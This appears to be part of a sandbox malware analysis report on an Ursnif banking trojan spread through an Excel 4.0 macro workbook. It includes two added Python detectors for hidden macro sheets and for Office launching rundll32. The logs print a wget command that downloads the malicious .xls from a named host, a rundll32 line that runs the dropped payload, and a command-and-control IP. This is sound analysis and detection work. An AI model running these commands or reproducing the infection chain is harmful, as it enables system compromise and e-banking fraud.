              Source: {ECA749BB-3EE3-11EB-90EB-ECF4BBEA1588}.dat.17.drString found in binary or memory: https://toldtonts.website/index.htmite/index.htm
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://webshell.suite.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://wus2-000.contentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://wus2-000.pagecontentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara match | File source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

              E-Banking Fraud:

              Yara detected Ursnif
              Source: Yara match | File source: identical to the list under Key, Mouse, Clipboard, Microphone and Screen Capturing above: the same 34 memory dumps of the rundll32.exe region at 0x05F50000 (type: MEMORY) and Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

              System Summary:

              Office process drops PE file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\rsfsv\drgd.dbvf
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
              Writes registry values via WMI
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
              Source: classification engine | Classification label: mal84.troj.expl.evad.win@16/46@6/3
              Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:684:120:WilError_01
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{850317AA-8546-462C-B1FE-96E615861FA5} - OProcSessId.dat
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
              Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
              Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1
              Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls'
              Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
              Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls'
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\wget.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: Binary string: c:\CompanyLast\SideCircle\LawRoad\storyForm\numberEat\smell.pdb | source: drgd.dbvf.3.dr
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 (the same hit is reported once for each of the 31 dumps of the 0x05F50000 region)
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\rsfsv\drgd.dbvf
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\rsfsv\drgd.dbvf
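The two Yara hits on the dropped workbook (the hidden Excel 4.0 macro sheet and John Lambert's SUSP_Excel4Macro_AutoOpen rule) both come down to two BIFF8 records inside the OLE2 "Workbook" stream: a BOUNDSHEET record whose sheet type byte is 0x01 (XLM macro sheet) with its visibility bits set to hidden or very hidden, and a NAME (Lbl) record carrying the built-in Auto_Open/Auto_Close name. The walker below is an added example written for this page, not Joe Sandbox or oletools code. It assumes the caller has already extracted the Workbook stream from the compound file (for instance with olefile) and does not handle CONTINUE records; the sample stream it parses is constructed inline to mirror the shape of the dropped .xls, not taken from the sample itself.

```python
"""Minimal BIFF8 record walker that flags hidden XLM macro sheets and
auto-exec defined names. Added example; the workbook stream below is
constructed here, it is not data from the analysed sample."""
import struct

BOF, BOUNDSHEET, LBL, EOF = 0x0809, 0x0085, 0x0018, 0x000A
HIDDEN_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}        # hsState bits 0-1
SHEET_TYPE = {0x00: "worksheet", 0x01: "xlm macro sheet", 0x02: "chart", 0x06: "vba module"}
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close", 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}


def iter_records(stream):
    """Yield (record_id, payload) for each 4-byte-headed BIFF record; stop on truncation."""
    off = 0
    while off + 4 <= len(stream):
        rid, size = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4: off + 4 + size]
        if len(payload) < size:          # truncated record: stop rather than misparse
            break
        yield rid, payload
        off += 4 + size


def _read_string(buf, cch):
    """XLUnicodeStringNoCch: one flag byte (bit 0 = UTF-16), then cch characters."""
    if buf[0] & 1:
        return buf[1:1 + 2 * cch].decode("utf-16-le", "replace")
    return buf[1:1 + cch].decode("latin-1")


def analyse_workbook_stream(stream):
    """Return sheet list, defined names and a verdict for one Workbook stream."""
    sheets, names = [], []
    for rid, p in iter_records(stream):
        if rid == BOUNDSHEET and len(p) >= 7:
            grbit = struct.unpack_from("<H", p, 4)[0]   # after the 4-byte lbPlyPos
            sheets.append({
                "name": _read_string(p[7:], p[6]),
                "state": HIDDEN_STATE.get(grbit & 0x03, "unknown"),
                "type": SHEET_TYPE.get((grbit >> 8) & 0xFF, "unknown"),
            })
        elif rid == LBL and len(p) >= 15:
            flags, cch = struct.unpack_from("<H", p, 0)[0], p[3]
            if flags & 0x20 and cch == 1:              # fBuiltin: the "name" is one code byte
                code = ord(_read_string(p[14:], 1))
                names.append(BUILTIN_NAMES.get(code, "builtin_%02x" % code))
            else:                                      # malware may also spell the name out
                names.append(_read_string(p[14:], cch))
    hidden_macro = [s for s in sheets if s["type"] == "xlm macro sheet" and s["state"] != "visible"]
    auto_exec = [n for n in names if n.lower().startswith(("auto_open", "auto_close"))]
    return {"sheets": sheets, "names": names,
            "hidden_macro_sheet": bool(hidden_macro), "auto_exec_name": bool(auto_exec),
            "suspicious": bool(hidden_macro and auto_exec)}


# --- constructed sample stream (hypothetical layout, not bytes from the real .xls) ---
def _rec(rid, payload):
    return struct.pack("<HH", rid, len(payload)) + payload

def _boundsheet(name, state, sheet_type, pos=0):
    grbit = (sheet_type << 8) | state
    return _rec(BOUNDSHEET, struct.pack("<IH", pos, grbit) + bytes([len(name), 0]) + name.encode("latin-1"))

def _lbl_builtin(code, itab=0):
    # flags=fBuiltin, chKey, cch=1, cce=0, reserved, itab, four reserved bytes, then the name
    header = struct.pack("<HBBHHH", 0x0020, 0, 1, 0, 0, itab) + b"\x00\x00\x00\x00"
    return _rec(LBL, header + bytes([0, code]))

def _lbl_plain(text):
    header = struct.pack("<HBBHHH", 0x0000, 0, len(text), 0, 0, 0) + b"\x00\x00\x00\x00"
    return _rec(LBL, header + bytes([0]) + text.encode("latin-1"))

SAMPLE_STREAM = (
    _rec(BOF, struct.pack("<HH", 0x0600, 0x0005) + b"\x00" * 12)   # BIFF8 workbook globals
    + _boundsheet("Sheet1", 0, 0x00)                               # visible worksheet
    + _boundsheet("Macro1", 2, 0x01)                               # very hidden XLM macro sheet
    + _lbl_builtin(0x01, itab=2)                                   # Auto_Open pointing at sheet 2
    + _rec(EOF, b"")
)
BENIGN_STREAM = _boundsheet("Sheet1", 0, 0x00) + _lbl_plain("MyRange") + _rec(EOF, b"")

if __name__ == "__main__":
    print(analyse_workbook_stream(SAMPLE_STREAM))
```

The verdict deliberately requires both conditions; a visible macro sheet or a stray Auto_Open name on its own is common in old legitimate workbooks, while the combination is what the sandbox's two signatures are keyed on.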
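The process tree above (EXCEL.EXE spawning rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer) is what the report's Sigma hit "Microsoft Office Product Spawning Windows Shell" and its "drops files with a non-matching file extension" signature describe. The following is an added example of the detection logic a SOC would run over process-creation telemetry to catch the same chain, together with the content-versus-extension check; it is not Joe Sandbox or Sigma code. The events are constructed in a Sysmon-like shape from this report's process list, and the field names ParentImage, Image and CommandLine are an assumption about the telemetry source.

```python
"""Detection logic for an Office app launching rundll32 on a non-DLL module
via DllRegisterServer, plus a PE-magic vs. extension check. Added example;
the event records are constructed, not exported from the sandbox."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe", "visio.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "rundll32.exe", "regsvr32.exe", "certutil.exe"}
DLL_EXTS = {".dll", ".cpl", ".ocx", ".drv", ".ax"}          # what rundll32 normally loads
PE_EXTS = DLL_EXTS | {".exe", ".sys", ".scr"}              # extensions that normally carry MZ content


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ext(path):
    base = _basename(path)
    return base[base.rfind("."):] if "." in base else ""


def parse_rundll32(cmdline):
    """Return (module_path, export) from 'rundll32[.exe] <module>,<export> ...',
    handling a quoted module path; None if this is not a rundll32 command line."""
    m = re.match(r'\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+(.*)', cmdline, re.I)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"'):
        end = rest.find('"', 1)
        module, rest = rest[1:end], rest[end + 1:]
    else:
        mm = re.match(r"([^,\s]+)(.*)", rest)            # module ends at the first comma/space
        module, rest = mm.group(1), mm.group(2)
    mm = re.match(r"\s*,\s*([^\s,]+)", rest)
    return module, (mm.group(1) if mm else None)


def evaluate_event(ev):
    """Return the rule names one process-creation event triggers (empty list if clean)."""
    hits = []
    parent, image = _basename(ev["ParentImage"]), _basename(ev["Image"])
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")               # the Sigma rule cited by the report
    if image == "rundll32.exe":
        parsed = parse_rundll32(ev["CommandLine"])
        if parsed:
            module, export = parsed
            if _ext(module) not in DLL_EXTS:
                hits.append("rundll32_non_dll_module")   # .dbvf, .png, .txt, no extension ...
            if export and export.lower() == "dllregisterserver":
                hits.append("rundll32_dllregisterserver")  # regsvr32's job, done by rundll32
    return hits


def flag_events(events):
    """Pair each suspicious event with its hits, keeping the input order."""
    return [(ev, evaluate_event(ev)) for ev in events if evaluate_event(ev)]


def extension_mismatch(path, head):
    """True when the file starts with the PE 'MZ' magic but its extension is not a PE one."""
    return head[:2] == b"MZ" and _ext(path) not in PE_EXTS


# Constructed events, shaped after the process list in this report (field names assumed).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\wget.exe",
     "CommandLine": "wget -t 2 -v -T 60 -P C:\\Users\\user\\Desktop\\download http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls"},
    {"ParentImage": r"C:\Windows\explorer.exe",                 # benign control-panel launch
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL'},
]

if __name__ == "__main__":
    for ev, hits in flag_events(SAMPLE_EVENTS):
        print(ev["CommandLine"], "->", hits)
```

The extension check is the cheap half of the sandbox's "drops files with a non-matching file extension" finding: drgd.dbvf starts with MZ, while the cached str[1].png that Excel fetched is judged by its own bytes, not its name, so a renamed payload does not slip past by carrying an image extension.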

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
              Source: wget.exe, 00000002.00000002.654002429.0000000000B78000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

              HIPS / PFW / Operating System Protection Evasion:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 45.142.213.232 187
              Injects files into Windows application
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Injected file: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls was created by C:\Windows\SysWOW64\wget.exe
              Yara detected hidden Macro 4.0 in Excel
              Source: Yara match, file source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPED
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmp, Binary or memory string: Program Manager
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmp, Binary or memory string: Progman
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\wget.exe, Queries volume information: C:\Users\user\Desktop\download VolumeInformation